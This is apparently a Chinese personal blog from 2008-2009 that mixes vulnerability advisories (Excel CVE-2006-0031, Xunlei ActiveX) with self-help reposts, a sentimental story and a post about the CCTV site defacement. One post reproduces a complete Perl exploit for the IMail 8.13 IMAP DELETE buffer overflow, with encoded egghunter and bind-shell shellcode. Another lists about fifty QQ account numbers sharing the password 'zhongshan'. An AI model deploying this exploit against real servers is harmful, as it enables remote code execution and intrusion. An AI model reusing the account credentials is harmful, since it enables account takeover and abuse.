此QQ将消失

[xfocus-SD-060314]Microsoft Office Excel 缓冲区溢出漏洞!

304993875@qq.com(此QQ将消失) — Sat, 22 Aug 2009 06:34:57 GMT

受影响的软件及系统：
====================
Microsoft Office Excel 2000
Microsoft Office Excel XP
Microsoft Office Excel 2003

CVE: CVE-2006-0031

综述：
======

Microsoft Excel是Office产品套件中的电子表格和分析程序。

XFOCUS安全小组发现Excel在处理特定".xls"文件时存在一个缓冲区溢出漏洞，这将导致Excel进程崩溃甚至执行任意代码。

分析：
======

Excel在打开".xls"文件时会将一个缓冲区初始化为0x0e0e0e0e，这时Excel错误的使用了初始化的长度，导致一个基于栈的缓冲区溢出。

以下代码来自excel v9.0.0.8924

>
> .text:3003FE0C movzx eax, word ptr [ebx]
> .text:3003FE0F xor ecx, ecx
> .text:3003FE11 cmp eax, 0Eh
> .text:3003FE14 mov [ebp+var_8], ecx
> .text:3003FE17 jg loc_301C01B5
>
> .text:301C01B5 mov byte ptr [ebp+ecx+var_138], cl
> .text:301C01BC inc ecx
> .text:301C01BD cmp ecx, 0Eh
> .text:301C01C0 jle short loc_301C01B5
> .text:301C01C2 cmp ecx, eax
> .text:301C01C4 mov [ebp-8], ecx
> .text:301C01C7 jg loc_3003FFC9
> .text:301C01CD sub eax, ecx
> .text:301C01CF lea edi, [ebp+ecx+var_138]
> .text:301C01D6 inc eax
> .text:301C01D7 mov edx, eax
> .text:301C01D9 mov eax, 0E0E0E0Eh
> .text:301C01DE mov ecx, edx
> .text:301C01E0 mov esi, ecx
> .text:301C01E2 shr ecx, 2
> .text:301C01E5 rep stosd <== buffer overflow

[转]小本钱创业赚大钱的不二法门

304993875@qq.com(此QQ将消失) — Sun, 07 Jun 2009 04:34:37 GMT

　　小本创业，许多情况不能大手大脚，要精打细算。
　　1、首先要做自己熟悉的事情
　　这点非常重要，任何项目任何行业都不是三天两天可以摸透的，不要把一个行业想得太简单，相关的行业经验非常重要，如果你对某个领域不熟悉，无论别人赚多少钱都不要去跟风，你跟风可能就是做别人的垫脚石。
　　2、客观评价自己
　　不要一味的觉得自己真的很能干，似乎什么东西自己都清楚，其实一个人的优势和特长是有限的，并且常常被自己欺骗，你要客观评价自己，就要主要让你的朋友亲人告诉你你性格外向还是内向？是否吃苦？是否放得下面子？是否有良好的表达能力？是否有良好的心理承受力？是否适合独立做事？适合有依赖性？是否是个乐观的人？是否有很强的自控力？等等。只有把这些调查清楚了，才明白自己是个什么样的人。
　　3、不要做高新技术和市场不成熟的行业
　　这些行业往往看起来利润可观，实际上门槛也很高，小本创业没有资本支持难以坚持那么久等到成功。
　　4、最好不要合伙
　　小本创业千万不要合伙(亲人除外)，理论上讲团队精神也好，合作也好，都是听起来有道理，小本创业无须合作，最好是自己单独做，否则，你的很多精力都会花在业务之外的地方。这点听起来似乎是错的，但是实际操作过程中却是正确的。你情愿雇员工不要合伙。
　　5、非常强的执行力
　　创业点子及策划只是一个短暂的过程，之后就是毫无生趣的执行阶段，这个阶段根本不是你想象中的充满乐趣和挑战的事情，相反，都是非常烦琐的事情，需要坚持不泄的去做。
　　6、让你的亲人支持你
　　这点也很重要，创业其实不是你一个人的事情，是你一家人的事情，是你所有朋友圈的事情，因为你创业必将影响到他们的生活，如果他们不理解不支持你是孤掌难鸣。坚持不多久就会放弃。

感悟人生～～！

304993875@qq.com(此QQ将消失) — Tue, 02 Jun 2009 05:11:38 GMT

人生道路坎坷，拥有自己的理想，而迟迟不能实现，使我现在过的很盲目，我就像一只趴在玻璃上的苍蝇，前方的路虽然很光明，我却始终找不到通往前方的路。我的人生道路在哪里？又该何去何从？

[转]富人和穷人的经典差异

304993875@qq.com(此QQ将消失) — Tue, 26 May 2009 10:58:20 GMT

1.自我认知　　
穷人：很少想到如何去赚钱和如何才能赚到钱，认为自己一辈子就该这样，不相信会有什么改变。
　　富人：骨子里就深信自己生下来不是要做穷人，而是要做富人，他有强烈的赚钱意识，这已是他血液里的东西，他会想尽一切办法使自己致富。
　　2.休闲
　　穷人：在家看电视，为肥皂剧的剧情感动得痛哭流涕，还要仿照电视里的时尚打扮自己。
　　富人：在外跑市场，即使打高尔夫球也不忘带着项目合同。
　　3.交际圈子
　　穷人：喜欢走穷亲戚，穷人的圈子大多是穷人，也排斥与富人交往，久而久之，心态成了穷人的心态，思维成了穷人的思维，做出来的事也就是穷人的模式。大家每天谈论着打折商品，交流着节约技巧，虽然有利于训练生存能力，但你的眼界也就渐渐囿于这样的琐事，而将雄心壮志消磨掉了。
　　富人：最喜欢交那种对自己有帮助，能提升自己各种能力的朋友。不纯粹放任自己仅以个人喜好交朋友。
　　4.学习
　　穷人：学手艺。
　　富人：学管理。
　　5.时间　　
穷人：一个享受充裕时间的人不可能挣大钱，要想悠闲轻松就会失去更多挣钱的机会。穷人的时间不值钱的，有时甚至多余，不知道怎么打发，怎么混起来才不烦。如果你可以因为买一斤白菜多花了一毛钱而气恼不已，却不为虚度一天而心痛，这就是典型的穷人思维。
　　富人：一个人无论以何种方式挣钱，也无论钱挣得是多是少，都必须经过时间的积淀。富人的玩也是一种工作方式，是有目的的。富人的闲，闲在身体，修身养性，以利再战，脑袋一刻也没有闲着；穷人的闲，闲在思想，他手脚都在忙，忙着去麻将桌上多摸几把。
　　6.归属感
　　穷人：是颗螺丝钉。穷人因为自身的卑微，缺少安全感，就迫切地希望自己从属并依赖于一个团体。于是他们以这个团体的标准为自己的标准，让自己的一切合乎规范，为团体的利益而工作，奔波，甚至迁徙。对于穷人来说，在一个著名的企业里稳定地工作几十年，由实习生一直干到高级主管，那简直是美妙得不能再美妙的理想了。
　　富人：那些团体的领导者通常都是富人，他们总是一方面向穷人灌输：团结就是力量，如果你不从属于自己这个团体，你就什么都不是，一文不名。但另一方面，他们却从来没有停止过招兵买马，培养新人，以便随时可以把你替换。
　　7.投资及对待财富
　　穷人：经典观点就是少用就等于多赚。比如开一家面馆，收益率是100%，投入2万，一年就净赚2万，对穷人来说很不错了。穷人即使有钱，也舍不得拿出来，即使终于下定决心投资，也不愿冒风险，最终还是走不出那一步。穷人最津津乐道的就是鸡生蛋，蛋生鸡，一本万利……但是建筑在一只母鸡身上的希望，毕竟是那样脆弱。
　　富人：富人的出发点是万本万利。同样的开面馆，富人们会想，一家面馆承载的资本只有2万，如果有1亿资金，岂不是要开5000家面馆？要一个一个管理好，大老板得操多少心，累白多少根头发呀？还不如投资宾馆，一个宾馆就足以消化全部的资本，哪怕收益率只有20%，一年下来也有2000万利润啊！
　　8.激情
　　能不能干成大事，首先要看有没有激情
　　穷人：没有激情。他总是按部就班，很难出大错，也绝不会做最好。没有激情就无法兴奋，就不可能全心全意投入工作，大部分的穷人不能说没有激情，但他的激情总是消耗在太具体的事情上；上司表扬了，他会激动；商店打折了，他会激动；电视里破镜重圆了，他的眼泪一串一串往下流，穷人有的只是一种情绪。
　　富人：“燕雀安知鸿鹄之志？”“王侯将相，宁有种乎？”有这样的激情，穷人终将不是穷人！激情是一种天性，是生命力的象征，有了激情，才有了灵感的火花，才有了鲜明的个性，才有了人际关系中的强烈感染力，也才有了解决问题的魅力和方法。
　　9.自信
穷人：穷人的自信要通过武装到牙齿，要通过一身高级名牌的穿戴和豪华的配饰才能给他们带来更多的自信，穷人的自信往往不是发自内心和自然天成的。
　　富人：李嘉诚在谈到他的经营秘诀时说：“其实也没什么特别的，光景好时，决不过分乐观；光景不好时，也不过度悲观”。其实就是一种富人特有的自信。自信才能不被外力所左右，自信才可能有正确的决定。
　　10.习惯
　　穷人：有个故事，一个富人送给穷人一头牛。穷人满怀希望开始奋斗。可牛要吃草，人要吃饭，日子很难。穷人于是把牛卖了，买了几只羊，吃了一只，剩下的来生小羊。可小羊迟迟没有生下来，日子又艰难了。穷人又把羊卖了，买成鸡。想让鸡生蛋赚钱为生，但是日子并没有改变，最后穷人把鸡也杀了，穷人的理想彻底崩溃了。这就是穷人的习惯。
　　富人：据一个投资专家说，富人成功秘诀就是：没钱时，不管多困难，也不要动用投资和积蓄，压力使你找到赚钱的新方法，帮你还清账单。这是个好习惯。性格形成习惯，习惯决定成功。
11.上网络
　　穷人：上网聊天。穷人聊天，一是穷人时间多，二是穷人的嘴天生就不能闲着。富人讲究荣辱不惊，温柔敦厚，那叫涵养，有涵养才能树大根深。穷人就顾不了那么多，成天受着别人的白眼，浑身沾满了鸡毛蒜皮，多少窝囊气啊，说说都不行？聊天有理！
　　富人：上网找投资机会。富人上网，更多的是利用网络的低成本高效率，寻找更多的投资机会和项目，把便利运用到自己的生意中来。
　　12.消费花钱
　　穷人：买名牌是为了体验满足感，最喜欢试验刚出来的流行时尚产品，相信贵的必然是好的。
　　富人：买名牌是为了节省挑选细节的时间，与消费品的售价相比，他们更在乎产品的质量，比如会买15元的纯棉T恤，也不会买昂贵的莱卡制品。

一条未发出的短信..

304993875@qq.com(此QQ将消失) — Wed, 29 Apr 2009 10:46:30 GMT

男孩和女孩是一对情侣，女孩喜欢感受下雨，男孩种是在下雨的时候为女孩撑着伞，伞的大半部分都是遮着女孩的，每次雨水都打湿着男孩的身子，他没说什么，只是默默看着女孩陶醉的脸。他觉得很幸福，女孩也觉得很幸福。
有天，男孩和女孩去游玩，男孩挽着女孩的手，正路过一个建筑工地，女孩兴奋的跳着嘴里还在说着些什么。男孩很少说话只是默默的看着她开心自己也开心。正说着的时候突然从楼上落下一块不大不小的碎石，正朝女孩头上砸来，此时已经来不急了，男孩一把抱过女孩，女孩尖叫了声。他想用自己的身体挡着碎石，正当快着地的时候，男孩猛的翻了个身让自己身体朝下，结果只是女孩的手被碎石砸到，骨折了。
女孩也才刚反应过来，痛的叫了出来，结果眼泪出来了，她想：古话‘夫妻本是同林鸟，大难临头各自飞’这句话果然没错。想着强忍着痛从男孩身上爬了起来。看也不看男孩一眼慢慢的跑了。
此时男孩在背后呼唤着女孩的名字，声音颤抖，嘴唇已经发白。他拿出手机拨了女孩的号码，女孩没接，再拨还是没接。反复几次他放弃了。只是手指在手机上按着什么，这时候男孩身边的血慢慢的蔓延开，他手垂了下来手机趟在血泊中，再也没力气按下发送键。

如果不能正常播放,请下载 Windows Media Player第二天，女孩得知男孩在医院抢救的消息，也顾不上生气就往医院跑。当她到医院的时候，医生已经宣布男孩抢救无效死亡了。原因是肺部失血过多。
原来当男孩想用身子挡着碎石的时候猛的发现地上矗立着一根十几厘米的钢筋。就猛的翻个身。用尽全身的力气只让碎石砸到女孩的手。自己却让钢筋插进肺部。
男孩的母亲把男孩的手机交到女孩手里，女还看着那还未发出去的短信：亲爱的，对不起我还是没能保护你，让你手受伤了……看到这里女孩再也忍不住了涌出眼眶，冲向到往男孩的天堂…… ．．．．．．

写日记了！

304993875@qq.com(此QQ将消失) — Wed, 24 Dec 2008 08:47:08 GMT

写日记了！写日记了！

这个算日记吗？郁闷中不知道写什么了，HO HO 。。。。。
随便弄点，这就是随笔吧！！

CCTV被黑了！！！！

304993875@qq.com(此QQ将消失) — Wed, 10 Dec 2008 15:27:30 GMT

CCTV也敢黑。真是佩服这孩子的胆量。。。（是胆量不是技术）

其实CCTV网站存在黑多漏洞，也有些黑客都进去过里面。

只是没有小波这孩子的胆量，还去改人家主页。这下出名了。。。

不过也要斜坡了，等着坐牢好了。。傻孩子。

那孩子博客留言。。

送QQ刷人气！

304993875@qq.com(此QQ将消失) — Tue, 09 Dec 2008 14:53:02 GMT

超多QQ刷人气，非送号~~！~~！！516356210----zhongshan 498068492----zhongshan
284335379----zhongshan
625063922----zhongshan
646581342----zhongshan
284337129----zhongshan
547023297----zhongshan
542638870----zhongshan
734035418----zhongshan
617333102----zhongshan
294216506----zhongshan
563979423----zhongshan
724781648----zhongshan
664865399----zhongshan
284786423----zhongshan
648443298----zhongshan
734131937----zhongshan
641091378----zhongshan
312530339----zhongshan
526153390----zhongshan
729958265----zhongshan
604996597----zhongshan
383590869----zhongshan
420431183----zhongshan
378649896----zhongshan
675155738----zhongshan
602026651----zhongshan
592932763----zhongshan
654816793----zhongshan
648874807----zhongshan
654816793----zhongshan
648874807----zhongshan
411836583----zhongshan
359658017----zhongshan
405274724----zhongshan
454230250----zhongshan
529174872----zhongshan
375997553----zhongshan
315501464----zhongshan
461436250----zhongshan
664671702----zhongshan
516914144----zhongshan
490654770----zhongshan
646200830----zhongshan
553907598----zhongshan
452507807----zhongshan
245164838----zhongshan
648874127----zhongshan
874134309----zhongshan
897621453----zhongshan
905492877----zhongshan

IMail IMAP Service DELETE 命令溢出漏洞

304993875@qq.com(此QQ将消失) — Tue, 09 Dec 2008 14:48:08 GMT

受影响系统 IMail Server 8.x详细描述
Muts 在 IMail Server 中发现一个安全漏洞, 能被恶意用户利用威胁到系统的安全。

这个漏洞的成因是由于IMAP service ("IMAP4D32.exe") 在处理 "DELETE" 命令时没有进行边界检查. 如果用户提交"DELETE"命令时附带超长的参数，(约 300 字节) 将导致缓冲区溢出。

成功利用者可以执行任意代码。

这个风险在 IMAIL 8.13 版本中发现，其它版本可能也受影响。

测试代码
#!/usr/bin/perl -w
###################################
#
# IPSwitch-IMail-8.13-DELETE
#
# Discovered by : Muts
# Coded by : Zatlander
# WWW.WHITEHAT.CO.IL
#
##################################
#
# Plain vanilla stack overflow in the DELETE command
# Restrictions:
# - Need valid authentication credentials
# - Input buffer only allows characters between x20 -> x7e
#
# Credits:
# - http://www.metasploit.org - HD Moore for the metasploit shellcode
# - http://www.edup.tudelft.nl/~bjwever/menu.html - skylined for the ALPHA ascii \
shellcode generator # - http://www.hick.org - for the syscall egghunt code in the \
paper "Understanding Windows Shellcode" #
##################################

use IO::Socket;
use Getopt::Std;
use Mail::IMAPClient;

print "Exploit for the IPSwitch IMail DELETE buffer overflow\n";
print "C0d3d by Zatlander\n";
print "Discovered by Muts\n";
print "WWW.WHITEHAT.CO.IL\n";
print "For hacking purposes only!!!\n\n";

# Find shellcode with signature "w00tw00t"; start from esp
# from 0 -> $egghunter = \
"TYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIVSyBUco0OKbWdp00ptH0uXqRnkHH2a3PL \
Mvtvqzm6NulfePabTiaxbycrb09Gjt5xkTySjeTsEzFmSo2eXyoKRA"; $egghunter = \
"TYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJINkN44skpmkt7fPTpptx0UXpBLKkx1Q3PL \
MtT4QxMVN5lc5sQSDxqyrjSW2VYUJRUXkp9SjVdT5KVosKrWxioKRA";

# Real shellcode: bind shell on port 4444 ( ./alpha edx < shellcode.bin )
$shellcode = "JJJJJJJJJJJJJJJJJ7RYjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIKLjH2vUP7puPQCQEV6aGn \
kbLWT28NkpEWLlKpT35QhgqKZlKPJvxLKQJWPuQXkKSdrSyLKgDLKuQJNVQ9okLP1KpLlP8kPBT7wyQXOVmvah \
GZKl25kSLwTGdqeKQlK2zUts1jKSVnktL0KNkaJWlUQxkLK7tnkUQM8zKgrVQYP1OqNQMQKkreXWpSnSZp03i1 \
tlKGilKSkvlLKQK5Lnk7kLKckTH0SSXLNpN6nJLKOJvK9IWK1ZLuPfawps0Rwv63cMYiuJHDguPuPS0Np7qWp7 \
pnV6ywhYwMttYt0Yym5QYK62inDvzd0Kwy4nMDniyXYUYkENMHKxmylgKpWPSVRSovS4ruPckLMpKupRqKOYGK \
9YOoyKsLMBUTTRJs7Ryv1RsYoTtNokOv534pYk9dDNnyrxrtkgWPTKOtwIoRutpfQkp2ppPrpF0spPPaPv09oR \
uFLniYWuaYKScpSe86bC07a3lmYIpSZVpRpQGyoruQ4QCF7kOv5thBsSdSgIoRuUpNiYWPhpCRmStwpoyXcLGy \
jDqIPnmQlQ4NLaz7e69zSlkNgJZosXlPTkvQT7TTP1TQvYWpDWTul5QUQLIcLTdRhK9SLQ4RlmY1letPPLMSt5 \
tFpqDrppQRqCaSqSa2iBqRqRspQKO45uPbH0rKNNS4VKOpU5TyoXPLIyvKO45S0QxnMN9fexNYov5S4oyHCbJK \
OKOTvkOzsyorU30BHl0MZfdaOkORu7tFQyKPSIo8PA";

getopts("h:u:p:", \%args);

if ((!defined $args{h}) || (!defined $args{u}) || (!defined $args{p})) {
print "Usage: $0 -h [host] -u [username] -p [password]\n";
exit;}

$usr = $args{u};
$pwd = $args{p};
$host = $args{h};

# jb +20; jnb +20 -> jump over return address (0x21 is first ascii safe offset)
$jmp21 = "r!s!";

# 0x6921526A -> pointer to "CALL [EDX+8]" ends up in return address
##########################################################################
# This should hopefully be the only version dependent variable here.
# Find an ASCII safe address pointing to a CALL [EDX+8] for your OS
##########################################################################
$calledx8 = "jR!i";

# aAA aligns ESP with the egghunter shellcode (popad, pop, pop)
$asciieh = "aAA" . $egghunter;
$asciisc = "w00tw00t" . $shellcode;
$email =
"From: \"The guy hacking you\" \r\n" .
"To: \"Poor You\" \r\n" .
"Subject: $asciisc\r\n" .
"Date: Wed, 3 Nov 2004 14:45:11 +0100\r\n" .
"Message-ID: <000101c4c1acdcndj6d69b90$5e01a8c0\@snorlax>\r\n" .
"Content-Type: text/plain;\r\n\tcharset=\"us-ascii\"\r\n" .
"Content-Transfer-Encoding: 7bit\r\n" .
"\r\n" .
$asciisc;

$payload = "A" x 236 . $jmp21 x 3 . $calledx8 . "S" x 29 . $asciieh . "\r\n";

print "Login in to $host as $usr/$pwd\n";
my $imap = Mail::IMAPClient->new( Server => $host, User => $usr, Password=> $pwd) or \
die "Cannot connect: $@"; print "count: " . $imap->message_count("Inbox") . "\n";
print "Sending EGG\n";
$imap->select("Inbox") or die "Could not select: $@\n";
my $uid = $imap->append( "Inbox", $email ) or die "Cannot append: $@";
$msg = $imap->message_string($uid) or die "Cannot get message: $@";
#$msg = $imap->body_string($uid) or die "Cannot get message: $@";
#print "retrieving $uid back: $msg\n";

print "Overflowing DELETE\n";
$imap->delete($payload) or die "Cannot delete: $@n";

print("Finished...\n");

解决方案
限制使用或暂时停用Imail Server

相关信息
http://secunia.com/advisories/13200/

迅雷activex缓冲区溢出漏洞。

304993875@qq.com(此QQ将消失) — Tue, 09 Dec 2008 14:46:23 GMT

迅雷ActiveX控件远程代码执行漏洞

迅雷是一款在中国非常流行的基于P2SP技术的下载软件。更多详细信息请参考：

http://www.xunlei.com

在迅雷5的一个ActiveX控件中存在一个远程代码执行漏洞，远程攻击者可利用此漏洞在被攻击者系统上以当前浏览器权限执行任意代码，进而可安装木马以及间谍程序。

Affected Software Versions:

迅雷5(Version of "DapCtrl*.dll" <= 1.5.578.28)

Details:

漏洞存在于由ActiveX控件"DapCtrl*.dll"导出的"Put()"函数中，相关信息如下：

InprocServer32: C:\Documents and Settings\All Users\Application Data\Thunder Network\KanKan\DapCtrl1.5.578.28.483.dll
ClassID : ACACC6EB-1FBA-4E13-A729-53AEB2DF54F8

[id(0x00000002)]
long Put([in] BSTR name, [in] VARIANT value);

如果把第一个参数name设置成某些特殊的object对象，将会导致可被利用的IE内存破坏，经过精心构造的多个破坏将导致IE运行到一个固定的地址，这个地址可利用IE中的javascript heap spray技术覆盖到，从而可稳定执行任意代码。

Solution:

厂商已在最新版本中修复了此漏洞，厂商公告可在如下地址找到：

http://safe.xunlei.com/announce/xl08040501.html

Disclosure Timeline: